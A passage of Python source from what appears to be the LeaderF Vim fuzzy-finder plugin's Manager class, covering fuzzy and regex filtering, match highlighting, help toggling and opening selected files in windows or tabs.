[] self._orig_line = '' self._launched = False self._ctrlp_pressed = False self._fuzzy_engine = None self._result_content = [] self._reader_thread = None self._timer_id = None self._highlight_method = lambda : None self._orig_cwd = None self._getExplClass() #************************************************************** # abstract methods, in fact all the functions can be overridden #************************************************************** def _getExplClass(self): """ this function MUST be overridden return the name of Explorer class """ raise NotImplementedError("Can't instantiate abstract class Manager " "with abstract methods _getExplClass") def _defineMaps(self): pass def _cmdExtension(self, cmd): """ this function can be overridden to add new cmd if return true, exit the input loop """ pass def _argaddFiles(self, files): # It will raise E480 without 'silent!' lfCmd("silent! argdelete *") for file in files: lfCmd("argadd %s" % escSpecial(file)) def _acceptSelection(self, *args, **kwargs): if len(args) == 0: return file = args[0] try: if not os.path.isabs(file): file = os.path.join(self._getInstance().getCwd(), lfDecode(file)) file = os.path.normpath(lfEncode(file)) if kwargs.get("mode", '') == 't': lfCmd("tab drop %s" % escSpecial(file)) else: lfCmd("hide edit %s" % escSpecial(file)) except vim.error as e: # E37 lfPrintError(e) def _getDigest(self, line, mode): """ this function can be overridden specify what part in the line to be processed and highlighted Args: mode: 0, return the full path 1, return the name only 2, return the directory name """ if mode == 0: return line elif mode == 1: return getBasename(line) else: return getDirname(line) def _getDigestStartPos(self, line, mode): """ this function can be overridden return the start position of the digest returned by _getDigest() Args: mode: 0, return the start postion of full path 1, return the start postion of name only 2, return the start postion of directory name """ if mode == 0 or mode == 2: return 0 else: return lfBytesLen(getDirname(line)) def _createHelp(self): return [] def _setStlMode(self, **kwargs): if self._cli.isFuzzy: if self._getExplorer().supportsNameOnly(): if self._cli.isFullPath: mode = 'FullPath' else: mode = 'NameOnly' else: mode = 'Fuzzy' else: mode = 'Regex' modes = {"--nameOnly", "--fullPath", "--fuzzy", "--regexMode"} for opt in kwargs.get("arguments", {}): if opt in modes: if opt == "--regexMode": mode = 'Regex' elif self._getExplorer().supportsNameOnly(): if opt == "--nameOnly": mode = 'NameOnly' elif opt == "--fullPath": mode = 'FullPath' else: # "--fuzzy" if self._cli.isFullPath: mode = 'FullPath' else: mode = 'NameOnly' elif opt in ("--nameOnly", "--fullPath", "--fuzzy"): mode = 'Fuzzy' break self._getInstance().setStlMode(mode) self._cli.setCurrentMode(mode) def _beforeEnter(self): self._resetAutochdir() def _afterEnter(self): if "--nowrap" in self._arguments: self._getInstance().window.options['wrap'] = False self._cleanup() self._defineMaps() lfCmd("runtime syntax/leaderf.vim") if is_fuzzyEngine_C: self._fuzzy_engine = fuzzyEngine.createFuzzyEngine(cpu_count, False) def _beforeExit(self): if self._getInstance().window.valid: self._getInstance().cursorRow = self._getInstance().window.cursor[0] self._getInstance().helpLength = self._help_length self._help_length = 0 self._show_help = False self._cleanup() self._getExplorer().cleanup() if self._fuzzy_engine: fuzzyEngine.closeFuzzyEngine(self._fuzzy_engine) self._fuzzy_engine = None if self._reader_thread and self._reader_thread.is_alive(): self._stop_reader_thread = True def _afterExit(self): pass def _bangEnter(self): pass def _bangReadFinished(self): pass def _getList(self, pairs): """ this function can be overridden return a list constructed from pairs Args: pairs: a list of tuple(weight, line, ...) """ return [p[1] for p in pairs] def _getUnit(self): """ indicates how many lines are considered as a unit """ return 1 def _supportsRefine(self): return False def _previewResult(self, preview): pass def _restoreOrigCwd(self): if self._orig_cwd is None: return # https://github.com/neovim/neovim/issues/8336 if lfEval("has('nvim')") == '1': chdir = vim.chdir else: chdir = os.chdir try: if int(lfEval("&autochdir")) == 0 and os.getcwd() != self._orig_cwd: chdir(self._orig_cwd) except: if os.getcwd() != self._orig_cwd: chdir(self._orig_cwd) def _needExit(self, line, arguments): return True def setArguments(self, arguments): self._arguments = arguments def getArguments(self): return self._arguments #************************************************************** def _needPreview(self, preview): """ Args: preview: if True, always preview the result no matter what `g:Lf_PreviewResult` is. """ preview_dict = lfEval("g:Lf_PreviewResult") category = self._getExplorer().getStlCategory() if not preview and int(preview_dict.get(category, 0)) == 0: return False if self._getInstance().window.cursor[0] <= self._help_length: return False if self._getInstance().empty() or vim.current.buffer != self._getInstance().buffer: return False if self._ctrlp_pressed == True: return True line = self._getInstance().currentLine if self._orig_line == line and self._getInstance().buffer.options['modifiable']: return False self._orig_line = line return True def _getInstance(self): if self._instance is None: self._instance = LfInstance(self._getExplorer().getStlCategory(), self._beforeEnter, self._afterEnter, self._beforeExit, self._afterExit) return self._instance def _createHelpHint(self): if self._getExplorer().getStlCategory() in ("Search_History", "Cmd_History"): return help = [] if not self._show_help: if lfEval("get(g:, 'Lf_HideHelp', 0)") == '0': help.append('" Press <F1> for help') help.append('" ---------------------------------------------------------') else: help += self._createHelp() self._help_length = len(help) orig_row = self._getInstance().window.cursor[0] if self._getInstance().isReverseOrder(): self._getInstance().buffer.options['modifiable'] = True self._getInstance().buffer.append(help[::-1]) self._getInstance().buffer.options['modifiable'] = False lfCmd("normal! Gzb") self._getInstance().window.cursor = (orig_row, 0) else: self._getInstance().buffer.options['modifiable'] = True self._getInstance().buffer.append(help, 0) self._getInstance().buffer.options['modifiable'] = False self._getInstance().window.cursor = (orig_row + self._help_length, 0) def _hideHelp(self): self._getInstance().buffer.options['modifiable'] = True if self._getInstance().isReverseOrder(): orig_row = self._getInstance().window.cursor[0] countdown = len(self._getInstance().buffer) - orig_row - self._help_length if self._help_length > 0: del self._getInstance().buffer[-self._help_length:] self._getInstance().buffer[:] = self._getInstance().buffer[-self._initial_count:] lfCmd("normal! Gzb") if 0 < countdown < self._initial_count: self._getInstance().window.cursor = (len(self._getInstance().buffer) - countdown, 0) else: self._getInstance().window.cursor = (len(self._getInstance().buffer), 0) self._getInstance().setLineNumber() else: del self._getInstance().buffer[:self._help_length] self._help_length = 0 def _getExplorer(self): if self._explorer is None: self._explorer = self._getExplClass()() return self._explorer def _resetAutochdir(self): if int(lfEval("&autochdir")) == 1: self._autochdir = 1 lfCmd("set noautochdir") else: self._autochdir = 0 def _setAutochdir(self): if self._autochdir == 1: # When autochdir is set, Vim will change the current working directory # to the directory containing the file which was opened or selected. lfCmd("set autochdir") def _toUp(self): adjust = False if self._getInstance().isReverseOrder() and self._getInstance().getCurrentPos()[0] == 1: adjust = True self._setResultContent() if self._cli.pattern and self._cli.isFuzzy \ and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \ and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")): self._highlight_method() lfCmd("norm! k") if adjust: lfCmd("norm! zt") self._getInstance().setLineNumber() lfCmd("setlocal cursorline!") # these two help to redraw the statusline, lfCmd("setlocal cursorline!") # also fix a weird bug of vim def _toDown(self): if not self._getInstance().isReverseOrder() \ and self._getInstance().getCurrentPos()[0] == self._getInstance().window.height: self._setResultContent() lfCmd("norm! j") self._getInstance().setLineNumber() lfCmd("setlocal cursorline!") # these two help to redraw the statusline, lfCmd("setlocal cursorline!") # also fix a weird bug of vim def _pageUp(self): if self._getInstance().isReverseOrder(): self._setResultContent() if self._cli.pattern and self._cli.isFuzzy \ and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \ and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")): self._highlight_method() lfCmd('exec "norm! \<PageUp>"') self._getInstance().setLineNumber() def _pageDown(self): if not self._getInstance().isReverseOrder(): self._setResultContent() lfCmd('exec "norm! \<PageDown>"') self._getInstance().setLineNumber() def _leftClick(self): if self._getInstance().window.number == int(lfEval("v:mouse_win")): lfCmd("exec v:mouse_lnum") lfCmd("exec 'norm!'.v:mouse_col.'|'") self._getInstance().setLineNumber() self.clearSelections() exit_loop = False else: self.quit() exit_loop = True return exit_loop def _search(self, content, is_continue=False, step=0): self.clearSelections() self._clearHighlights() self._clearHighlightsPos() self._cli.highlightMatches() if not self._cli.pattern: # e.g., when <BS> or <Del> is typed self._getInstance().setBuffer(content[:self._initial_count]) self._getInstance().setStlResultsCount(len(content)) self._result_content = [] return if self._cli.isFuzzy: self._fuzzySearch(content, is_continue, step) else: self._regexSearch(content, is_continue, step) if self._getExplorer().getStlCategory() not in ["File"]: self._previewResult(False) def _filter(self, step, filter_method, content, is_continue, use_fuzzy_engine=False, return_index=False): """ Construct a list from result of filter_method(content). Args: step: An integer to indicate the number of lines to filter one time. filter_method: A function to apply `content` as parameter and return an iterable. content: The list to be filtered. """ unit = self._getUnit() step = step // unit * unit length = len(content) if self._index == 0: self._cb_content = [] self._result_content = content self._index = min(step, length) cur_content = content[:self._index] else: if not is_continue and not self._getInstance().empty(): self._cb_content += self._result_content if len(self._cb_content) >= step: cur_content = self._cb_content[:step] self._cb_content = self._cb_content[step:] else: cur_content = self._cb_content left = step - len(self._cb_content) self._cb_content = [] if self._index < length: end = min(self._index + left, length) cur_content += content[self._index:end] self._index = end if self._cli.isAndMode: result, highlight_methods = filter_method(cur_content) if is_continue: self._previous_result = (self._previous_result[0] + result[0], self._previous_result[1] + result[1]) result = self._previous_result else: self._previous_result = result return (result, highlight_methods) elif use_fuzzy_engine: if return_index: mode = 0 if self._cli.isFullPath else 1 tmp_content = [self._getDigest(line, mode) for line in cur_content] result = filter_method(source=tmp_content) result = (result[0], [cur_content[i] for i in result[1]]) else: result = filter_method(source=cur_content) if is_continue: self._previous_result = (self._previous_result[0] + result[0], self._previous_result[1] + result[1]) result = self._previous_result else: self._previous_result = result else: result = list(filter_method(cur_content)) if is_continue: self._previous_result += result result = self._previous_result else: self._previous_result = result return result def _fuzzyFilter(self, is_full_path, get_weight, iterable): """ return a list, each item is a pair (weight, line) """ getDigest = partial(self._getDigest, mode=0 if is_full_path else 1) pairs = ((get_weight(getDigest(line)), line) for line in iterable) MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT return (p for p in pairs if p[0] > MIN_WEIGHT) def _fuzzyFilterEx(self, is_full_path, get_weight, iterable): """ return a tuple, (weights, indices) """ getDigest = partial(self._getDigest, mode=0 if is_full_path else 1) if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2 iterable = itertools.islice(iterable, 0, None, self._getUnit()) pairs = ((get_weight(getDigest(line)), i) for i, line in enumerate(iterable)) MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT result = [p for p in pairs if p[0] > MIN_WEIGHT] if len(result) == 0: weights, indices = [], [] else: weights, indices = zip(*result) return (list(weights), list(indices)) def _refineFilter(self, first_get_weight, get_weight, iterable): getDigest = self._getDigest triples = ((first_get_weight(getDigest(line, 1)), get_weight(getDigest(line, 2)), line) for line in iterable) MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT return ((i[0] + i[1], i[2]) for i in triples if i[0] > MIN_WEIGHT and i[1] > MIN_WEIGHT) def _andModeFilter(self, iterable): encoding = lfEval("&encoding") use_fuzzy_engine = False cur_content = iterable weight_lists = [] highlight_methods = [] for p in self._cli.pattern: if self._fuzzy_engine and isAscii(p) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2 use_fuzzy_engine = True pattern = fuzzyEngine.initPattern(p) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=False, sort_results=False) elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag", "Function", "History", "Cmd_History", "Search_History", "Tag", "Rg"]: filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=False) else: filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=not self._cli.isFullPath, sort_results=False) getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine, pattern=pattern, is_name_only=not self._cli.isFullPath) highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True, clear=False) elif is_fuzzyMatch_C and isAscii(p): pattern = fuzzyMatchC.initPattern(p) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False) else: getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True) filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, getWeight) highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, clear=False) else: fuzzy_match = FuzzyMatch(p, encoding) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, fuzzy_match.getWeight2) elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag", "Function", "History", "Cmd_History", "Search_History", "Tag", "Rg"]: filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, fuzzy_match.getWeight3) else: filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, fuzzy_match.getWeight) highlight_method = partial(self._highlight, self._cli.isFullPath, fuzzy_match.getHighlights, clear=False) if use_fuzzy_engine: mode = 0 if self._cli.isFullPath else 1 tmp_content = [self._getDigest(line, mode) for line in cur_content] result = filter_method(source=tmp_content) else: result = filter_method(cur_content) for i, wl in enumerate(weight_lists): weight_lists[i] = [wl[j] for j in result[1]] weight_lists.append(result[0]) if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2 unit = self._getUnit() result_content = [cur_content[i*unit:i*unit + unit] for i in result[1]] cur_content = list(itertools.chain.from_iterable(result_content)) else: cur_content = [cur_content[i] for i in result[1]] result_content = cur_content highlight_methods.append(highlight_method) weights = [sum(i) for i in zip(*weight_lists)] return ((weights, result_content), highlight_methods) def _fuzzySearch(self, content, is_continue, step): encoding = lfEval("&encoding") use_fuzzy_engine = False use_fuzzy_match_c = False if self._cli.isAndMode: filter_method = self._andModeFilter elif self._cli.isRefinement: if self._cli.pattern[1] == '': # e.g. abc; if self._fuzzy_engine and isAscii(self._cli.pattern[0]): use_fuzzy_engine = True return_index = True pattern = fuzzyEngine.initPattern(self._cli.pattern[0]) filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=not is_continue) getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True) highlight_method = partial(self._highlight, True, getHighlights, True) elif is_fuzzyMatch_C and isAscii(self._cli.pattern[0]): use_fuzzy_match_c = True pattern = fuzzyMatchC.initPattern(self._cli.pattern[0]) getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True) filter_method = partial(self._fuzzyFilter, False, getWeight) highlight_method = partial(self._highlight, False, getHighlights) else: fuzzy_match = FuzzyMatch(self._cli.pattern[0], encoding) getWeight = fuzzy_match.getWeight getHighlights = fuzzy_match.getHighlights filter_method = partial(self._fuzzyFilter, False, getWeight) highlight_method = partial(self._highlight, False, getHighlights) elif self._cli.pattern[0] == '': # e.g. ;abc if self._fuzzy_engine and isAscii(self._cli.pattern[1]): use_fuzzy_engine = True return_index = True pattern = fuzzyEngine.initPattern(self._cli.pattern[1]) filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=False, sort_results=not is_continue) getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine, pattern=pattern, is_name_only=False) highlight_method = partial(self._highlight, True, getHighlights, True) elif is_fuzzyMatch_C and isAscii(self._cli.pattern[1]): use_fuzzy_match_c = True pattern = fuzzyMatchC.initPattern(self._cli.pattern[1]) getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False) filter_method = partial(self._fuzzyFilter, True, getWeight) highlight_method = partial(self._highlight, True, getHighlights) else: fuzzy_match = FuzzyMatch(self._cli.pattern[1], encoding) getWeight = fuzzy_match.getWeight getHighlights = fuzzy_match.getHighlights filter_method = partial(self._fuzzyFilter, True, getWeight) highlight_method = partial(self._highlight, True, getHighlights) else: # e.g. abc;def if is_fuzzyMatch_C and isAscii(self._cli.pattern[0]): is_ascii_0 = True pattern_0 = fuzzyMatchC.initPattern(self._cli.pattern[0]) getWeight_0 = partial(fuzzyMatchC.getWeight, pattern=pattern_0, is_name_only=True) getHighlights_0 = partial(fuzzyMatchC.getHighlights, pattern=pattern_0, is_name_only=True) else: is_ascii_0 = False fuzzy_match_0 = FuzzyMatch(self._cli.pattern[0], encoding) getWeight_0 = fuzzy_match_0.getWeight getHighlights_0 = fuzzy_match_0.getHighlights if is_fuzzyMatch_C and isAscii(self._cli.pattern[1]): is_ascii_1 = True pattern_1 = fuzzyMatchC.initPattern(self._cli.pattern[1]) getWeight_1 = partial(fuzzyMatchC.getWeight, pattern=pattern_1, is_name_only=False) getHighlights_1 = partial(fuzzyMatchC.getHighlights, pattern=pattern_1, is_name_only=False) else: is_ascii_1 = False fuzzy_match_1 = FuzzyMatch(self._cli.pattern[1], encoding) getWeight_1 = fuzzy_match_1.getWeight getHighlights_1 = fuzzy_match_1.getHighlights use_fuzzy_match_c = is_ascii_0 and is_ascii_1 filter_method = partial(self._refineFilter, getWeight_0, getWeight_1) highlight_method = partial(self._highlightRefine, getHighlights_0, getHighlights_1) else: if self._fuzzy_engine and isAscii(self._cli.pattern) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2 use_fuzzy_engine = True pattern = fuzzyEngine.initPattern(self._cli.pattern) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: return_index = False filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern, is_name_only=False, sort_results=not is_continue) elif self._getExplorer().getStlCategory() in ["Rg"]: if "--match-path" in self._arguments: return_index = False filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=not is_continue) else: return_index = True filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=not is_continue) elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag", "Function", "History", "Cmd_History", "Search_History", "Tag"]: return_index = True filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=not is_continue) else: return_index = True filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=not self._cli.isFullPath, sort_results=not is_continue) getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine, pattern=pattern, is_name_only=not self._cli.isFullPath) highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True) elif is_fuzzyMatch_C and isAscii(self._cli.pattern): use_fuzzy_match_c = True pattern = fuzzyMatchC.initPattern(self._cli.pattern) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False) else: getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True) filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, getWeight) highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights) else: fuzzy_match = FuzzyMatch(self._cli.pattern, encoding) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, fuzzy_match.getWeight2) elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag", "Function", "History", "Cmd_History", "Search_History", "Rg"]: filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, fuzzy_match.getWeight3) else: filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, fuzzy_match.getWeight) highlight_method = partial(self._highlight, self._cli.isFullPath, fuzzy_match.getHighlights) if self._cli.isAndMode: if self._fuzzy_engine and isAscii(''.join(self._cli.pattern)): step = 20000 * cpu_count else: step = 10000 pair, highlight_methods = self._filter(step, filter_method, content, is_continue) pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True) self._result_content = self._getList(pairs) elif use_fuzzy_engine: if step == 0: if return_index == True: step = 20000 * cpu_count else: step = 40000 * cpu_count pair = self._filter(step, filter_method, content, is_continue, True, return_index) if is_continue: # result is not sorted pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True) self._result_content = self._getList(pairs) else: self._result_content = pair[1] else: if step == 0: if use_fuzzy_match_c: step = 40000 elif self._getExplorer().supportsNameOnly() and self._cli.isFullPath: step = 6000 else: step = 12000 pairs = self._filter(step, filter_method, content, is_continue) pairs.sort(key=operator.itemgetter(0), reverse=True) self._result_content = self._getList(pairs) self._getInstance().setBuffer(self._result_content[:self._initial_count]) self._getInstance().setStlResultsCount(len(self._result_content)) if self._cli.isAndMode: self._highlight_method = partial(self._highlight_and_mode, highlight_methods) self._highlight_method() else: self._highlight_method = highlight_method self._highlight_method() def _highlight_and_mode(self, highlight_methods): self._clearHighlights() for i, highlight_method in enumerate(highlight_methods): highlight_method(hl_group='Lf_hl_match' + str(i % 5)) def _clearHighlights(self): for i in self._highlight_ids: lfCmd("silent! call matchdelete(%d)" % i) self._highlight_ids = [] def _clearHighlightsPos(self): self._highlight_pos = [] self._highlight_pos_list = [] self._highlight_refine_pos = [] def _resetHighlights(self): self._clearHighlights() unit = self._getUnit() bottom = len(self._getInstance().buffer) - self._help_length if self._cli.isAndMode: highlight_pos_list = self._highlight_pos_list else: highlight_pos_list = [self._highlight_pos] for n, highlight_pos in enumerate(highlight_pos_list): hl_group = 'Lf_hl_match' + str(n % 5) for i, pos in enumerate(highlight_pos): if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8])))) self._highlight_ids.append(id) for i, pos in enumerate(self._highlight_refine_pos): if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8]))) self._highlight_ids.append(id) def _highlight(self, is_full_path, get_highlights, use_fuzzy_engine=False, clear=True, hl_group='Lf_hl_match'): # matchaddpos() is introduced by Patch 7.4.330 if (lfEval("exists('*matchaddpos')") == '0' or lfEval("g:Lf_HighlightIndividual") == '0'): return cb = self._getInstance().buffer if self._getInstance().empty(): # buffer is empty. return highlight_number = int(lfEval("g:Lf_NumberOfHighlight")) if clear: self._clearHighlights() getDigest = partial(self._getDigest, mode=0 if is_full_path else 1) unit = self._getUnit() if self._getInstance().isReverseOrder(): if self._help_length > 0: content = cb[:-self._help_length][::-1] else: content = cb[:][::-1] else: content = cb[self._help_length:] if use_fuzzy_engine: self._highlight_pos = get_highlights(source=[getDigest(line) for line in content[:highlight_number:unit]]) else: # e.g., self._highlight_pos = [ [ [2,3], [6,2] ], [ [1,4], [7,6], ... ], ... ] # where [2, 3] indicates the highlight starts at the 2nd column with the # length of 3 in bytes self._highlight_pos = [get_highlights(getDigest(line)) for line in content[:highlight_number:unit]] if self._cli.isAndMode: self._highlight_pos_list.append(self._highlight_pos) bottom = len(content) for i, pos in enumerate(self._highlight_pos): start_pos = self._getDigestStartPos(content[unit*i], 0 if is_full_path else 1) if start_pos > 0: for j in range(len(pos)): pos[j][0] += start_pos if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8])))) self._highlight_ids.append(id) def _highlightRefine(self, first_get_highlights, get_highlights): # matchaddpos() is introduced by Patch 7.4.330 if (lfEval("exists('*matchaddpos')") == '0' or lfEval("g:Lf_HighlightIndividual") == '0'): return cb = self._getInstance().buffer if self._getInstance().empty(): # buffer is empty. return highlight_number = int(lfEval("g:Lf_NumberOfHighlight")) self._clearHighlights() getDigest = self._getDigest unit = self._getUnit() if self._getInstance().isReverseOrder(): if self._help_length > 0: content = cb[:-self._help_length][::-1] else: content = cb[:][::-1] else: content = cb[self._help_length:] bottom = len(content) self._highlight_pos = [first_get_highlights(getDigest(line, 1)) for line in content[:highlight_number:unit]] for i, pos in enumerate(self._highlight_pos): start_pos = self._getDigestStartPos(content[unit*i], 1) if start_pos > 0: for j in range(len(pos)): pos[j][0] += start_pos if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('Lf_hl_match', %s)" % str(pos[j:j+8]))) self._highlight_ids.append(id) self._highlight_refine_pos = [get_highlights(getDigest(line, 2)) for line in content[:highlight_number:unit]] for i, pos in enumerate(self._highlight_refine_pos): start_pos = self._getDigestStartPos(content[unit*i], 2) if start_pos > 0: for j in range(len(pos)): pos[j][0] += start_pos if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8]))) self._highlight_ids.append(id) def _regexFilter(self, iterable): def noErrMatch(text, pattern): try: return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text, pattern)) except TypeError: # python 2 return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern)) except ValueError: # python 3 return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern)) try: if ('-2' == lfEval("g:LfNoErrMsgMatch('', '%s')" % escQuote(self._cli.pattern))): return iter([]) else: return (line for line in iterable if noErrMatch(escQuote(self._getDigest(line, 0).strip()), escQuote(self._cli.pattern))) except vim.error: return iter([]) def _regexSearch(self, content, is_continue, step): if not self._cli.isPrefix: self._index = 0 self._result_content = self._filter(8000, self._regexFilter, content, is_continue) self._getInstance().setBuffer(self._result_content[:self._initial_count]) self._getInstance().setStlResultsCount(len(self._result_content)) def clearSelections(self): for i in self._selections.values(): lfCmd("call matchdelete(%d)" % i) self._selections.clear() def _cleanup(self): if lfEval("g:Lf_RememberLastSearch") == '0': self._pattern_bak = self._cli.pattern self._cli.clear() self._clearHighlights() self._clearHighlightsPos() self.clearSelections() @modifiableController def toggleHelp(self): self._show_help = not self._show_help if self._getInstance().isReverseOrder(): if self._help_length > 0: del self._getInstance().buffer[-self._help_length:] else: del self._getInstance().buffer[:self._help_length] self._createHelpHint() self.clearSelections() self._resetHighlights() if self._getInstance().isReverseOrder(): self._getInstance().window.height = len(self._getInstance().buffer) def _accept(self, file, mode, *args, **kwargs): if file: if mode == '': pass elif mode == 'h': lfCmd("split") elif mode == 'v': lfCmd("bel vsplit") kwargs["mode"] = mode tabpage_count = len(vim.tabpages) self._acceptSelection(file, *args, **kwargs) if mode == 't' and len(vim.tabpages) > tabpage_count: tab_pos = int(lfEval("g:Lf_TabpagePosition")) if tab_pos == 0: lfCmd("tabm 0") elif tab_pos == 1: lfCmd("tabm -1") elif tab_pos == 3: lfCmd("tabm") def accept(self, mode=''): if self._getInstance().isReverseOrder(): if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length: lfCmd("norm! k") return else: if self._getInstance().window.cursor[0] <= self._help_length: lfCmd("norm! j") return if self._getExplorer().getStlCategory() == "Rg" \ and self._getInstance().currentLine == self._getExplorer().getContextSeparator(): return self._cli.writeHistory(self._getExplorer().getStlCategory()) # https://github.com/neovim/neovim/issues/8336 if lfEval("has('nvim')") == '1': chdir = vim.chdir else: chdir = os.chdir cwd = os.getcwd() if len(self._selections) > 0: files = [] for i in sorted(self._selections.keys()): files.append(self._getInstance().buffer[i-1]) if "--stayOpen" in self._arguments: try: vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos() except vim.error: # error if original buffer is an No Name buffer pass else: self._getInstance().exitBuffer() # https://github.com/Yggdroot/LeaderF/issues/257 win_local_cwd = lfEval("getcwd(winnr())") if cwd != win_local_cwd: chdir(cwd) orig_cwd = os.getcwd() if mode == '': self._argaddFiles(files) self._accept(files[0], mode) else: for file in files: self._accept(file, mode) if os.getcwd() != orig_cwd: dir_changed_by_autocmd = True else: dir_changed_by_autocmd = False need_exit = True else: file = self._getInstance().currentLine line_nr = self._getInstance().window.cursor[0] need_exit = self._needExit(file, self._arguments) if need_exit: if "--stayOpen" in self._arguments: try: vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos() except vim.error: # error if original buffer is an No Name buffer pass else: self._getInstance().exitBuffer() # https://github.com/Yggdroot/LeaderF/issues/257 win_local_cwd = lfEval("getcwd(winnr())") if cwd != win_local_cwd: chdir(cwd) orig_cwd = os.getcwd() self._accept(file, mode, self._getInstance().buffer, line_nr) # for bufTag if os.getcwd() != orig_cwd: dir_changed_by_autocmd = True else: 